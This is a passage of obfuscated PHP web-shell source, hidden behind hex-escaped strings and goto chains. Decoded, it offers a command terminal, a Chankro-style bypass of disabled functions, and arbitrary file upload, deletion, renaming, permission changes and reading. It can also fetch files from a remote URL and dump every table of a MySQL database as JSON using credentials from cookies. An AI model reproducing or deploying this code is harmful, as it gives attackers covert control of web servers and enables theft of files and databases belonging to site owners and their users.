\160\165\164\55\x72\145\141\154\47\x29\x3b\15\12\x63\x6f\x6e\163\x74\40\x61\152\141\170\x46\x6f\x72\x6d\40\75\40\x64\157\143\x75\x6d\145\x6e\x74\56\147\x65\164\x45\x6c\x65\155\145\x6e\164\x42\x79\111\144\x28\x27\x61\x6a\x61\x78\x55\160\154\157\x61\x64\x46\x6f\162\155\47\x29\x3b\15\xa\x63\x6f\156\x73\164\40\x73\x74\141\x74\x75\x73\104\x69\166\40\75\40\144\157\143\x75\x6d\145\x6e\164\56\x67\145\x74\105\154\x65\155\x65\156\164\x42\x79\x49\x64\x28\47\x75\x70\154\157\x61\x64\x53\x74\141\164\165\x73\47\51\x3b\15\xa\x63\x6f\x6e\x73\164\40\160\162\157\147\x72\145\x73\x73\103\x6f\156\164\141\x69\156\145\x72\x20\x3d\x20\x64\157\143\165\155\145\x6e\164\56\147\145\164\x45\x6c\145\155\145\156\164\x42\x79\111\x64\50\x27\160\162\x6f\x67\162\x65\x73\x73\x2d\143\157\156\164\141\x69\156\145\x72\47\x29\73\15\12\x63\157\x6e\163\x74\40\x70\162\x6f\147\x72\145\163\x73\102\x61\x72\40\75\x20\x64\x6f\143\x75\155\145\156\164\x2e\147\x65\x74\105\x6c\x65\x6d\145\x6e\x74\x42\171\111\144\x28\x27\x70\x72\157\x67\x72\x65\x73\x73\55\x62\141\162\x27\x29\73\xd\xa\15\12\151\x66\40\50\165\x70\154\x6f\141\144\120\141\156\145\154\51\40\x7b\xd\12\40\x20\40\x20\57\57\40\x54\x72\x69\x67\x67\x65\x72\40\146\151\x6c\145\40\151\x6e\x70\x75\164\x20\143\x6c\151\143\x6b\x20\167\150\x65\x6e\x20\x70\x61\x6e\x65\154\40\151\x73\40\x63\154\151\143\x6b\x65\x64\15\12\40\40\x20\x20\x75\160\154\x6f\141\x64\x50\x61\156\x65\x6c\56\141\x64\144\x45\x76\x65\156\164\x4c\151\x73\164\145\156\x65\162\50\x27\143\x6c\x69\x63\153\x27\x2c\x20\x28\51\40\75\x3e\x20\173\15\xa\x20\40\40\40\x20\40\x20\40\x72\145\x61\x6c\106\151\x6c\145\111\156\160\165\x74\x2e\143\x6c\x69\143\153\50\x29\x3b\xd\12\x20\x20\40\40\175\x29\73\xd\12\x20\x20\x20\x20\57\x2f\x20\110\141\156\144\154\145\40\x66\x69\x6c\x65\x20\x73\x65\x6c\145\143\164\x69\x6f\156\40\166\x69\141\x20\x62\x72\x6f\x77\163\x65\xd\xa\40\x20\40\40\162\145\x61\x6c\x46\x69\154\x65\111\156\x70\165\164\x2e\141\144\144\105\x76\x65\156\164\114\151\x73\x74\145\x6e\x65\162\x28\47\143\x68\x61\x6e\147\145\47\54\x20\x28\51\40\75\76\x20\x7b\15\xa\40\40\x20\40\x20\x20\x20\40\151\x66\40\50\162\x65\141\x6c\106\x69\154\x65\111\x6e\160\165\164\x2e\x66\x69\x6c\145\x73\x2e\154\x65\x6e\147\164\x68\x20\76\40\60\51\40\173\15\12\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x68\x61\156\x64\x6c\145\x55\x70\x6c\157\141\144\50\162\x65\x61\154\x46\151\x6c\x65\x49\156\x70\x75\164\56\146\x69\154\x65\x73\133\60\x5d\51\x3b\xd\12\40\40\x20\40\x20\x20\x20\40\175\15\xa\x20\x20\40\x20\175\51\73\15\12\x20\x20\x20\40\57\57\x20\x44\x72\141\x67\40\141\x6e\144\40\104\162\157\x70\x20\145\x76\145\156\x74\163\15\xa\40\x20\40\x20\165\160\x6c\157\x61\144\x50\x61\156\145\x6c\56\141\x64\144\105\x76\145\x6e\x74\114\x69\x73\x74\x65\x6e\x65\162\x28\47\144\162\x61\147\x6f\166\x65\162\47\54\40\50\x65\x29\x20\75\x3e\40\173\15\12\40\40\40\40\x20\40\40\x20\145\56\160\x72\x65\166\x65\156\x74\x44\x65\146\141\x75\154\164\x28\x29\x3b\15\xa\x20\x20\40\40\40\40\40\x20\x75\x70\154\157\141\x64\x50\141\x6e\145\154\x2e\143\x6c\x61\163\x73\x4c\x69\163\x74\x2e\x61\x64\144\50\47\144\162\x61\147\x2d\x6f\x76\145\162\47\x29\73\15\12\x20\x20\x20\x20\x7d\51\x3b\15\xa\x20\40\40\40\165\160\154\x6f\x61\144\x50\141\x6e\145\x6c\56\141\x64\144\x45\166\x65\x6e\164\x4c\151\163\164\x65\156\145\162\50\x27\144\162\x61\147\154\x65\141\166\145\x27\x2c\40\x28\x29\40\x3d\76\40\x7b\15\12\40\40\x20\40\x20\x20\40\40\x75\x70\x6c\157\141\144\120\141\156\145\154\x2e\143\x6c\x61\163\163\114\x69\163\x74\56\x72\145\x6d\157\x76\x65\50\47\144\x72\141\x67\x2d\x6f\166\x65\162\47\51\x3b\15\xa\40\x20\x20\40\175\51\73\xd\xa\x20\40\40\40\165\x70\x6c\157\x61\144\x50\x61\x6e\145\x6c\56\141\x64\x64\x45\x76\145\x6e\164\x4c\x69\x73\164\x65\x6e\x65\162\50\x27\144\162\x6f\x70\47\x2c\40\x28\145\x29\40\x3d\x3e\40\x7b\xd\12\x20\40\x20\40\40\x20\40\40\145\x2e\x70\x72\x65\166\x65\x6e\x74\x44\x65\146\x61\x75\x6c\x74\50\51\73\15\xa\40\x20\x20\40\x20\40\x20\x20\165\160\154\x6f\141\x64\x50\141\x6e\x65\x6c\56\143\154\141\163\x73\114\151\x73\x74\56\x72\x65\x6d\157\x76\x65\x28\47\x64\162\x61\147\55\157\x76\x65\x72\47\51\73\15\12\40\40\40\x20\40\40\40\40\143\157\156\x73\x74\40\x66\x69\154\x65\163\40\75\x20\145\56\x64\141\x74\x61\x54\162\x61\x6e\163\146\x65\x72\56\x66\151\x6c\x65\163\73\xd\xa\40\40\x20\x20\x20\40\x20\x20\151\146\x20\50\x66\151\x6c\x65\x73\x2e\x6c\x65\x6e\x67\164\150\40\x3e\x20\60\x29\40\x7b\15\12\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\150\141\x6e\144\154\145\125\x70\x6c\157\141\x64\50\x66\151\154\145\x73\133\60\135\x29\73\xd\12\40\40\40\x20\x20\40\x20\x20\175\15\12\40\40\40\40\x7d\51\x3b\15\12\x7d\15\12\15\xa\xd\12\146\x75\x6e\x63\x74\151\157\x6e\x20\150\x61\156\x64\154\145\125\x70\x6c\157\x61\144\50\x66\x69\154\x65\x29\40\x7b\15\xa\x20\x20\x20\40\143\x6f\x6e\x73\x74\40\146\x6f\162\x6d\x44\141\164\x61\x20\x3d\x20\156\145\167\x20\x46\157\162\155\104\141\x74\x61\x28\141\152\x61\170\x46\157\162\x6d\x29\x3b\xd\12\40\40\x20\40\x66\x6f\x72\x6d\104\141\x74\141\56\163\145\164\x28\47\165\x66\x69\154\145\47\54\x20\146\151\154\x65\51\x3b\xd\12\x20\x20\x20\40\57\57\x20\115\141\x6b\x65\x20\x73\165\x72\x65\x20\164\150\x65\40\146\151\x6c\x65\40\x69\163\x20\x63\x6f\x72\162\145\143\164\x6c\x79\x20\x73\x65\x74\15\12\x20\x20\40\40\xd\xa\40\x20\40\x20\x63\x6f\156\x73\164\40\170\x68\162\40\75\x20\156\x65\167\40\x58\x4d\x4c\110\164\164\x70\122\145\x71\165\x65\x73\x74\x28\51\x3b\xd\xa\40\x20\40\40\x78\150\x72\x2e\157\160\x65\x6e\50\x27\120\117\123\124\x27\54\x20\x61\152\141\x78\x46\x6f\162\155\x2e\x61\143\x74\x69\x6f\x6e\40\x7c\x7c\x20\167\x69\156\x64\x6f\167\56\154\157\143\x61\164\151\157\156\x2e\150\x72\145\x66\54\x20\164\162\x75\x65\51\x3b\xd\xa\15\xa\x20\40\x20\x20\x2f\x2f\40\x50\162\157\147\x72\145\x73\x73\40\x65\166\x65\156\164\xd\12\x20\40\x20\40\x78\150\x72\56\x75\x70\154\x6f\141\144\56\x61\x64\144\x45\x76\x65\x6e\164\x4c\151\163\x74\x65\x6e\x65\162\x28\47\160\x72\157\x67\162\x65\x73\163\47\54\x20\x28\145\x29\40\75\x3e\x20\x7b\xd\12\40\x20\x20\40\x20\40\x20\x20\151\146\40\x28\x65\x2e\154\145\x6e\x67\164\x68\x43\x6f\155\x70\165\164\x61\142\154\145\51\x20\x7b\xd\xa\x20\40\x20\40\40\40\x20\x20\40\40\40\40\x63\x6f\x6e\x73\164\40\160\145\162\143\145\156\x74\x43\x6f\x6d\160\154\x65\164\x65\40\x3d\x20\50\145\x2e\154\x6f\x61\144\145\x64\x20\x2f\x20\x65\56\x74\x6f\164\141\x6c\51\40\52\x20\61\x30\x30\73\xd\xa\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x70\162\x6f\147\x72\x65\163\163\103\x6f\156\164\x61\x69\x6e\145\x72\x2e\163\x74\x79\x6c\x65\x2e\x64\151\163\x70\x6c\141\x79\40\75\x20\x27\x62\154\157\143\153\47\x3b\15\xa\x20\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\160\x72\157\x67\162\145\163\x73\x42\141\162\x2e\x73\x74\x79\154\x65\x2e\167\151\x64\x74\x68\40\x3d\40\160\145\162\x63\x65\156\164\103\x6f\x6d\x70\x6c\145\x74\145\x20\53\x20\47\45\47\x3b\xd\xa\40\x20\40\x20\40\x20\x20\x20\x7d\xd\12\40\40\x20\x20\175\x29\73\xd\12\40\x20\x20\x20\170\x68\x72\56\x6f\156\154\x6f\x61\x64\163\164\141\x72\164\x20\75\x20\146\165\x6e\x63\x74\x69\157\156\x28\51\x20\x7b\15\xa\x20\40\x20\40\x20\40\x20\x20\163\164\x61\x74\x75\x73\104\x69\166\x2e\151\x6e\x6e\x65\x72\124\145\x78\x74\40\75\x20\x60\125\160\154\157\141\144\151\x6e\147\x20\44\173\x66\151\x6c\x65\x2e\x6e\x61\x6d\x65\x7d\56\56\56\140\73\15\xa\40\40\x20\x20\40\x20\40\x20\163\164\x61\164\x75\163\104\151\166\56\163\164\171\x6c\x65\x2e\143\x6f\x6c\157\x72\x20\x3d\40\47\x23\x64\144\x64\x27\x3b\15\xa\x20\40\x20\x20\x20\x20\x20\x20\x70\162\157\x67\162\x65\x73\x73\102\x61\x72\56\x73\x74\x79\154\x65\56\x77\151\144\x74\x68\x20\75\x20\47\60\45\x27\x3b\15\xa\40\40\x20\40\175\73\xd\xa\15\12\x20\x20\x20\40\170\x68\x72\56\x6f\156\154\x6f\x61\144\x20\x3d\40\x66\x75\x6e\143\164\x69\x6f\156\40\x28\x29\40\x7b\xd\xa\x20\40\x20\40\x20\x20\40\x20\x63\157\x6e\x73\164\40\162\x65\x73\40\75\x20\x78\x68\x72\56\x72\145\x73\160\x6f\156\x73\145\124\145\x78\164\x2e\164\162\x69\x6d\50\x29\73\xd\12\x20\x20\x20\40\40\x20\40\x20\x69\x66\x20\50\170\x68\162\56\163\x74\x61\x74\x75\x73\x20\75\x3d\x3d\x20\62\60\60\x20\46\x26\x20\162\145\x73\x2e\x74\x6f\x4c\x6f\167\145\x72\x43\x61\163\x65\x28\51\56\151\x6e\x63\154\x75\144\x65\163\x28\x22\x73\165\143\143\145\163\163\x22\51\x29\x20\173\15\12\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\40\163\x74\x61\164\165\x73\x44\151\x76\56\x73\164\171\154\145\56\x63\157\x6c\157\x72\40\75\40\x27\43\x30\60\106\106\x30\x30\x27\73\xd\12\40\40\40\x20\40\40\40\40\x20\40\40\40\163\x74\x61\164\x75\163\x44\x69\166\56\151\x6e\156\x65\162\x54\145\x78\x74\40\x3d\x20\47\x55\160\154\157\141\x64\40\163\165\x63\x63\145\x73\163\146\x75\x6c\x21\x20\x52\145\146\162\145\163\150\x69\x6e\x67\x2e\x2e\56\47\x3b\15\xa\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\160\162\157\147\162\145\163\x73\102\x61\162\56\163\x74\x79\154\x65\56\x77\x69\144\x74\x68\x20\75\40\47\61\x30\60\45\x27\x3b\15\12\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\163\x65\x74\124\x69\x6d\145\157\165\x74\50\50\x29\x20\75\76\40\173\xd\xa\40\40\40\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\57\57\x20\122\x65\x66\x72\145\163\150\40\164\x68\x65\x20\x70\141\147\145\x20\x74\157\40\x73\150\x6f\167\x20\164\150\145\40\156\x65\167\x20\146\151\x6c\145\15\12\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\156\x61\x76\151\x67\x61\164\x65\50\47\x62\x65\162\153\141\163\x27\x2c\40\x27"; goto E63b99a7bded2b71; A7dd97e3aa47a853: print "\74\x73\x63\x72\x69\x70\164\76\141\154\x65\x72\164\50\42\x54\150\151\163\40\x66\x6f\154\144\x65\162\x20\141\154\x72\x65\x61\x64\171\x20\x65\x78\x69\x73\x74\163\41\x22\x29\73\74\x2f\163\x63\x72\x69\x70\x74\76"; goto Ca34b8f9f13cc01f; b02f1078dd631bc3: d8151f06b565f065: goto D6208148cf11e119; b2face7b7c24a865: echo "\x27\51\x3b\42\40\143\x6c\141\x73\163\75\x22\x62\x74\156\55\x6d\x6f\x64\145\x72\x6e\42\76\74\151\40\143\154\x61\x73\163\x3d\42\146\x61\163\x20\x66\x61\x2d\x74\x65\162\155\x69\156\141\x6c\x22\x3e\x3c\x2f\x69\76\40\103\157\x6d\x6d\141\x6e\x64\74\x2f\141\x3e\15\xa\x3c\x61\x20\x68\162\145\x66\x3d\42\152\141\x76\141\163\x63\x72\151\x70\x74\72\156\141\x76\x69\147\x61\x74\x65\50\x27\141\x77\x61\154\47\54\40\x27\143\150\x61\156\153\x72\x6f\x5f\x6b\157\155\x27\x2c\40\47\142\145\x72\x6b\141\x73\x27\x2c\x20\47"; goto c0ea8d9b76cd6ee4; edab936cc647c145: C9980f4bfea186cd: goto A5f0c17924f67dea; ea0ed492c65554ec: Fccf723f4598f37e: goto b3814503a220eedb; F9a4df132f1f3421: edfd78ace6f77159: goto A47a7dae38288a9b; C54832b5a0368328: c90385137e26d524: goto ac0b80bddab42b16; E16f80a52447fde3: echo "\74\57\163\x70\141\156\x3e\xd\xa\x3c\x2f\x70\76\15\12\xd\xa\40\x20\40\40\40\x20\x20\x20\x3c\x70\76\xd\xa\40\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x3c\163\x74\x72\157\x6e\147\40\x73\164\x79\154\145\x3d\x22\x63\x6f\x6c\157\x72\x3a\40\43\x30\60\x46\106\60\x30\73\x22\76\125\163\x65\x72\72\74\57\163\x74\x72\157\156\x67\x3e\xd\xa\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\74\x73\x70\141\156\40\x73\x74\x79\x6c\145\x3d\x22\x63\x6f\x6c\x6f\x72\72\x20\43\146\x66\146\x66\146\x66\x3b\x22\76"; goto dc027202a3345c55; C0113f6f255e61bf: Ca1c7347d04c7cd2: goto c6bf488b7f5307c0; C79a46076fe94ac9: Daed7a02a31c17ab: goto cc436186d58805ef; dfdfedadfee45198: $A28aed829b792880 = realpath(F64198Cb3E765A83($_POST["\x7a\x66"])); goto De1345512719c872; b2089d5a41aadb81: goto F9818fcc162c7d4a; goto bed725cf8b12ecfa; Fd0244532655fdee: $Cb7c56c153b6fafa = isset($_COOKIE["\x64\141\164\141\142\141\x73\x65"]) ? $_COOKIE["\144\x61\x74\x61\x62\x61\x73\x65"] : ''; goto cc947deafe44fb60; e6563d1b2cb68258: rename($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3, $f6f05644d791da73 . $c9c3dbf37270f221 . $C317bca205c5d454); goto F214beb7cf170a5a; A28200051a55e358: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" && substr($dc0f70f3261828f3, 0, 1) != "\x2f" ? "\57" : ''; goto B18ee73070df17a9; F550f944d7bce64b: Caad016db36469e1: goto f42e99074ccb7a6b; bff0715e69083258: E58301630dd97e16: goto e7b43cfa9649163f; A4c4ea4c92181fa5: $C30da0039db7258c = "\106\x61\151\154\x65\x64\x20\164\157\40\143\x68\141\x6e\147\145\x20\x70\145\162\155\x69\x73\x73\151\x6f\156\x73\40\146\157\x72\40\47" . htmlspecialchars($dc0f70f3261828f3) . "\47\56\40\103\x68\x65\143\x6b\40\x73\145\162\166\145\162\40\160\x65\162\155\151\163\x73\151\x6f\156\x73\56"; goto F9d0a285c48c2b42; c4e3a676510fd3bd: eb5ee57488e6707c: goto Af1e08937c7df338; Cb205ff756326612: echo "\74\57\x73\160\x61\156\76\15\xa\40\x20\x20\40\40\40\40\x20\74\57\x70\76\xd\12\40\x20\40\40\40\40\x20\x20\74\x70\76\xd\xa\40\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x3c\163\164\162\x6f\156\147\40\163\164\171\x6c\x65\75\42\x63\x6f\154\157\x72\x3a\x20\x23\x30\x30\106\x46\x30\x30\73\x22\76\x53\145\x72\166\x65\x72\40\x54\151\x6d\145\x3a\x3c\57\x73\x74\x72\157\x6e\147\x3e\xd\xa\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\74\x73\160\141\x6e\40\163\x74\171\x6c\145\x3d\42\x63\157\154\x6f\162\x3a\x20\43\x66\x66\146\146\x66\146\73\42\x3e"; goto ac4338713fb7f806; f79f81c5d304bfa0: ini_set("\x6d\x61\170\x5f\145\x78\145\143\x75\164\151\x6f\156\137\164\x69\x6d\145", "\63\60\60"); goto A09b8a39649acdf7; Af5256653f5bcc41: goto E7de99818e67e41e; goto C54832b5a0368328; B7f1f73c82bd29e3: $a7f67c975f1e2b87 = explode("\54", $A7c4a80f18b5dd9e); goto fad5b6cf739d253e; eb4931c0d48e4f93: echo "\x27\51\x3b\15\xa\40\40\x20\40\175\xd\12\175\xd\12\xd\xa\146\x75\x6e\x63\x74\x69\157\x6e\x20\143\150\141\x6e\147\x65\120\x65\x72\x6d\151\x73\x73\x69\x6f\x6e\163\x28\x66\x61\x79\x6c\x2c\x20\143\165\162\x72\145\x6e\164\137\x70\145\x72\155\163\x29\x20\173\xd\xa\40\x20\x20\40\166\x61\162\40\x6e\145\167\x50\x65\x72\x6d\x73\x20\75\40\160\x72\157\x6d\160\x74\50\47\x45\156\x74\145\162\x20\x6e\x65\167\x20\x70\x65\162\x6d\151\x73\x73\x69\x6f\x6e\163\x20\x28\145\56\147\56\54\x20\60\x37\65\65\x29\x3a\47\x2c\40\x63\165\x72\x72\145\x6e\164\x5f\160\145\162\x6d\x73\x29\73\xd\12\40\x20\40\40\151\146\x20\x28\x6e\145\x77\x50\x65\x72\155\x73\40\46\x26\x20\x6e\x65\167\x50\145\x72\155\163\x20\x21\x3d\x3d\x20\143\165\x72\162\x65\156\x74\x5f\160\x65\162\155\x73\x29\x20\x7b\xd\12\40\x20\x20\x20\40\x20\x20\x20\x2f\57\40\102\x61\x73\151\143\x20\166\141\154\151\x64\x61\x74\x69\157\x6e\40\x6f\x6e\40\143\x6c\x69\145\x6e\x74\x20\x73\x69\144\x65\xd\12\x20\40\x20\x20\x20\40\40\40\x69\x66\40\x28\57\x5e\x5b\x30\55\x37\135\x7b\63\54\x34\175\44\x2f\x2e\x74\145\x73\x74\x28\x6e\x65\x77\x50\x65\162\155\x73\51\x29\40\x7b\xd\12\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x6e\x61\166\x69\x67\141\x74\x65\50\47\141\167\x61\154\47\x2c\40\47\x75\142\141\x68\137\160\x65\162\155\x27\x2c\40\x27\146\x61\x79\x6c\x27\54\40\x66\x61\171\x6c\x2c\x20\47\160\x65\x72\155\x27\54\x20\x6e\x65\167\x50\x65\162\x6d\x73\54\x20\x27\x62\145\x72\x6b\x61\x73\47\54\x20\x27"; goto de4175a8b6cf7c73; D0294a12f9234528: print "\x54\145\162\155\x69\156\141\154\40\x72\x65\x61\144\171\56\x20\x45\156\164\145\162\40\141\x20\143\x6f\155\155\x61\x6e\144\x20\142\145\x6c\157\167\x2e"; goto e4de45ab10a8ad4b; c8eb4eedace1defd: try { goto D6a01ae18833743a; Fc8c6caa0011e86d: header("\x43\x6f\156\x74\x65\x6e\164\x2d\144\x69\x73\160\x6f\x73\151\x74\151\157\x6e\x3a\x20\141\164\164\141\x63\x68\x6d\x65\x6e\x74\73\40\146\x69\154\x65\156\x61\x6d\145\75\144\137\x62\x5f" . basename(htmlspecialchars($Cb7c56c153b6fafa)) . "\x2e\152\163\x6f\156"); goto d79edf6daa560cb8; a79c037aa9a31c4b: $Bc2cb3ec1c2c0c3d = array(); goto F374e270f3188af2; F374e270f3188af2: $cf1490e54a29ea1a = $dd10a73ee2d1f279->prepare("\x53\105\114\x45\103\x54\x20\x74\141\142\154\145\x5f\156\141\155\x65\40\x66\x72\157\155\x20\x69\156\x66\x6f\x72\155\x61\164\x69\157\x6e\x5f\163\143\x68\145\155\x61\56\164\x61\142\x6c\x65\x73\40\x77\150\145\x72\x65\40\x74\141\x62\154\x65\137\163\x63\x68\145\155\x61\x3d\77"); goto A409b1069e614f75; e44987427f45b784: $cf1490e54a29ea1a = $cf1490e54a29ea1a->fetchAll(); goto c087647c7eb2e30b; F404de3fd50dc100: $dd10a73ee2d1f279->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); goto a79c037aa9a31c4b; D6a01ae18833743a: $dd10a73ee2d1f279 = new PDO("\x6d\171\x73\x71\154\x3a\150\x6f\x73\164\75" . $e7fc7ef47502e99b . "\x3b\x63\150\141\x72\163\145\164\75\x75\x74\146\x38\x3b" . $a5064888437638ee, $cf583f5d73ccf3cf, $c887d06bec538904, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\x45\124\x20\x4e\x41\115\105\x53\x20\x27\x75\x74\146\70\47")); goto F404de3fd50dc100; Bf60cfcb29a55e05: echo json_encode(a6801581813b0ACe($Bc2cb3ec1c2c0c3d)); goto A98eeacedb3e7a3f; C539f10cf39ef033: A96dfb29e0f917fe: goto Fc8c6caa0011e86d; d79edf6daa560cb8: header("\103\157\x6e\x74\x65\156\164\55\164\171\x70\x65\72\40\141\160\x70\154\151\x63\141\x74\x69\x6f\156\57\152\163\x6f\x6e"); goto Bf60cfcb29a55e05; c087647c7eb2e30b: foreach ($cf1490e54a29ea1a as $A815e8104dbdb799) { goto e009b45bc4280eb4; bee2757ccf5ddb03: Dd0b561cadfa97ae: goto ac848a9589ce4cfa; e009b45bc4280eb4: $A815e8104dbdb799 = $A815e8104dbdb799["\164\x61\142\154\x65\x5f\x6e\x61\x6d\145"]; goto Ca0325e91c91f5f3; Ca0325e91c91f5f3: $Bae9033c3cf95c45 = $dd10a73ee2d1f279->query("\x53\x45\x4c\105\x43\124\40\52\40\x46\122\117\115\x20\140" . $A815e8104dbdb799 . "\140"); goto c539a82571385682; c539a82571385682: $Bae9033c3cf95c45 = $Bae9033c3cf95c45->fetchAll(); goto Bca4874272d7cd49; Bca4874272d7cd49: $Bc2cb3ec1c2c0c3d[$A815e8104dbdb799] = $Bae9033c3cf95c45 ? array($Bae9033c3cf95c45) : array(); goto bee2757ccf5ddb03; ac848a9589ce4cfa: } goto C539f10cf39ef033; A409b1069e614f75: $cf1490e54a29ea1a->execute(array($Cb7c56c153b6fafa)); goto e44987427f45b784; A98eeacedb3e7a3f: } catch (Exception $E4d444a4fd968be8) { print $E4d444a4fd968be8->getMessage(); } goto Ae02f358419a0f8e; D378c5d5a7da70e6: print "\74\x64\151\x76\x20\x63\x6c\141\163\163\x3d\42\164\x65\x72\x6d\151\x6e\141\x6c\x2d\x63\157\156\164\x61\151\x6e\x65\162\x22\x3e"; goto d6357eec5971e440; Bbb07d88a2765327: Ef64ffae7c428734: goto c78f84ab104e8e8c; adce49c8bb8b2746: F82aafb4462037fe: goto F0b358cc80457be6; ba7f3e4d3f095795: ed90a0b3b0285bdd: goto D1e49cacdf5aaa1a; b629dc89ca72a0d2: b63f43f9262a1cf5: goto B643d082463853bd; ac7b1e9e94be321a: echo "\x22\76\xd\12\40\40\x20\40\40\40\40\40\74\151\x6e\x70\165\x74\40\164\171\160\145\75\x22\x74\145\170\164\x22\x20\160\154\x61\x63\145\x68\x6f\154\144\145\x72\x3d\x22\120\x61\x73\163\x77\157\162\144\42\x20\x6e\x61\155\x65\x3d\x22\163\141\x6e\144\x69\42\x20\x76\141\154\x75\x65\x3d\42"; goto E04e8956ea49eef3; ba5e7a9d93f73125: $c31208d29cfc6afb = "\x46\151\x6c\x65\40\x27" . htmlspecialchars($dc0f70f3261828f3) . "\x27\40\x64\145\154\145\x74\145\144\40\x73\165\143\143\x65\x73\163\x66\x75\x6c\x6c\171\56"; goto De01fc6cb41f9290; e71a6a3bc83a3b93: $D83b9efcbcab33a5 = trim($_POST["\x68\x6f\x73\164"]) === '' ? "\x6c\x6f\x63\x61\x6c\150\x6f\163\164" : $_POST["\150\157\163\164"]; goto fbdfbdf3ad4014bc; f9dfba669b9fb655: if (file_exists($Babedf152eb7b8d1)) { goto b4cff1a9e1f68642; } goto C2360080d1fc6582; f55deb0ea3f2f0d6: echo "\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x3c\141\40\x68\162\x65\146\x3d\42\x6a\141\x76\x61\163\x63\162\151\x70\164\72\x6e\141\x76\x69\x67\141\x74\145\50\x27\x61\x77\x61\154\x27\54\40\47\144\142\x5f\x6c\x6f\147\x6f\165\x74\x27\51\42\x20\x63\x6c\x61\163\x73\75\42\x62\164\x6e\55\155\157\144\145\x72\x6e\42\x20\163\164\x79\x6c\145\75\42\142\x61\x63\x6b\x67\x72\157\x75\156\x64\55\x63\x6f\x6c\x6f\x72\72\43\144\x63\63\x35\x34\65\x3b\x20\164\x65\170\164\55\x64\145\143\x6f\162\x61\x74\151\157\156\x3a\156\x6f\156\145\73\42\x3e\114\157\x67\x6f\165\x74\74\57\x61\76\xd\xa\x20\40\x20\x20\40\x20\40\xd\xa\x20\x20\40\40\x20\40\40\x20\x20"; goto fa54dd5a356a9945; Ac30d4b3c146f509: unlink($_FILES["\x75\160\x6c\x6f\141\x64\x5f\146\x69\x6c\x65"]["\164\155\x70\x5f\156\141\155\x65"]); goto B114509ff7b8c487; abacec14d3431d6f: $F09b543791deeb4d = $_POST["\x63\157\x6e\x74\145\x6e\164"]; goto B2ad8f7c1cbae398; fece1904235170af: b4cbe7078613c9dc: goto ef1895577f2dbcab; A09b8a39649acdf7: function A5FCeE151E68d72f($d8463d93c69599f9) { goto e1179efded3c4fd6; e1179efded3c4fd6: $d8463d93c69599f9 = preg_replace("\57\133\x5e\141\x2d\172\101\x2d\132\60\55\x39\x5f\134\x2e\55\x5d\57", "\137", basename($d8463d93c69599f9)); goto F9d2aa476bdcd49f; Bccb098660bb446c: return $d8463d93c69599f9; goto F0569df98a485823; F8fdfa2eb5054369: a992427539f0d1a9: goto Bccb098660bb446c; C6880443fdec7380: $d8463d93c69599f9 = "\x75\160\154\x6f\x61\x64\137" . $d8463d93c69599f9; goto F8fdfa2eb5054369; F9d2aa476bdcd49f: if (!($d8463d93c69599f9 === basename(__FILE__))) { goto a992427539f0d1a9; } goto C6880443fdec7380; F0569df98a485823: } goto ac9c4bd8fa68b816; ddbb3787eb7fd074: $fc2606403ba285ea = "\77\x61\x77\141\x6c\75\x62\141\x63\x61\x5f\146\x69\x6c\x65\46\x66\x61\171\154\75" . b526E9837163414E($dc0f70f3261828f3) . "\46\142\145\x72\x6b\x61\163\75" . B526e9837163414E($f6f05644d791da73); goto B19a872dd93085ee; aefa9895459c7868: C18e553155011f1d: goto C24ef47e9753448b; C294d1b2a8197841: if ($ffc943dc0b3a48b0 == "\163\x6b\154") { goto Edbb4c1c04a93749; } goto e88dcc542851a79e; Fd1ec1ff24a7620b: e0a0d6bb3360087a: goto B3122b329c6f3a9c; Ff0774e1b3b25c2c: echo "\x27\x29\x3b\15\xa\x20\40\40\x20\175\xd\12\x7d\xd\xa\15\xa\146\165\x6e\x63\x74\x69\157\156\x20\x63\157\x6d\160\x72\145\163\163\106\157\154\144\x65\x72\50\172\x66\51\x20\173\xd\12\x20\40\x20\x20\x76\141\162\x20\x64\151\x72\x20\75\x20\160\162\157\155\x70\164\50\47\123\x61\x76\145\x20\x63\157\155\160\162\145\x73\x73\145\x64\40\146\x69\x6c\145\40\x74\x6f\x20\x64\151\162\145\x63\164\x6f\162\x79\x3a\x27\54\40\x22"; goto Fce69b935fb92a4e; E3a54784769ca2d8: $e8b6725d00c743ed = []; goto Fc2aa833269445db; f1a81cdc636799a1: if (is_file($f6f05644d791da73 . $c9c3dbf37270f221 . $a1cb9ff287442a69)) { goto da35e10a6c56735c; } goto B28e3fed720aff95; C863644dc4796d8c: @$cc9d3fdc32097547($f6f05644d791da73); goto fcf81aa0da022b40; cf4d6a1b88890aa3: goto Ad5f12b0b76fcc7b; goto F2a40387df3a3b61; bbcad1a899670afb: $Cd1e6c38bf6c5fac = $f6f05644d791da73; goto Dd70772b59dcf295; e4de45ab10a8ad4b: goto Ff03b8c80281a683; goto f061a7777b35dda9; Dd9b8b3835dcf54f: readfile($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3); goto D48f5cfbb72e3cf5; bafe97c3d8dcbe7b: goto D974408241273e32; goto e5574cda59e8f360; af23d8d7ca2089d9: D775e8d069ff6323: goto b124c27d35c0a2a3; Eec922d8383f4475: if ($ffc943dc0b3a48b0 == "\146\145\x74\x63\150\137\146\151\154\x65" && isset($_POST["\x66\x65\x74\143\150\137\x75\x72\x6c"]) && !empty($_POST["\146\x65\164\143\x68\137\x75\x72\x6c"])) { goto dad0068a12e5dd25; } goto d0233e7dba3c1f41; f11cc99917239789: $ec12ef4150496dc6 = $A6f056c3d73cfecd[1]; goto e6df3b670079a41f; a7af51f264249f20: 